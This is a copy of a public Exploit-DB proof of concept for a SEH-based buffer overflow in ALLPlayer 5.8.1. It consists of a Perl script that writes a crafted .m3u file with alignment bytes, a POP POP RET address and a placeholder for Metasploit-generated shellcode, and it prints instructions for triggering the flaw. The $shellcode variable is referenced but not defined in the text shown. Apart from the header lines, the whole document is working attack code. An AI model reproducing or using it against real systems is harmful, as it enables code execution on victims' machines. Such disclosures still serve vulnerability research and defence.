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ALLPlayer 5.8.1 - (.m3u file) Buffer Overflow (SEH)
来源:http://www.exploit-db.com 作者:Seljan 发布时间:2014-03-04  
# Exploit Title: ALLPlayer 5.8.1 - (.m3u) Buffer Overflow (SEH)               #
# Date: Mar 1 2014                                                            #
# Exploit Author: Gabor Seljan                                                #
# Software Link: http://www.allplayer.org/download/allplayer                  #
# Version: 5.8.1                                                              #
# Tested on: Windows 7 SP1                                                    #
# This application is still vulnerable to a buffer overflow, caused by improper
# bounds checking of an URL given via menu or placed inside an M3U file.
# Credit to previous exploits:
#   + http://www.exploit-db.com/exploits/29798/ by Mike Czumak
#   + http://www.exploit-db.com/exploits/28855/ by metacom
use strict;
use warnings;
my $filename = "sploit.m3u";
my $junk1 = "\x41" x 301;   # Offset to SEH
my $nSEH  = "\x61\x50";     # POPAD # Venetian padding
my $SEH   = "\x50\x45";     # POP POP RET from ALLPlayer.exe
my $junk2 = "\x42" x 700;
my $align = "\x53".         # PUSH EBX
            "\x6e".         # Venetian padding
            "\x58".         # POP EAX
            "\x6e".         # Venetian padding
            "\x05\x14\x11". # ADD EAX,0x11001400
            "\x6e".         # Venetian padding
            "\x2d\x13\x11". # SUB EAX,0x11001300
            "\x6e".         # Venetian padding
            "\x50".         # PUSH EAX
            "\x6e".         # Venetian padding
            "\xc3";         # RET
my $nops = "\x71" x 109;
# msfpayload windows/exec cmd=calc.exe R
# msfencode -e x86/unicode_mixed BufferRegister=EAX
my $sploit = $junk1.$nSEH.$SEH.$align.$nops.$shellcode.$junk2;
open(FILE, ">$filename") || die "[-]Error:\n$!\n";
print FILE "http://$sploit";
print "\nExploit file created successfully [$filename]!\n\n";
print "You can either:\n";
print "\t1. Open the created $filename file directly with ALLPlayer\n";
print "\t2. Open the crafted URL via menu by Open movie/sound -> Open URL\n\n";
print "http://$sploit\n";

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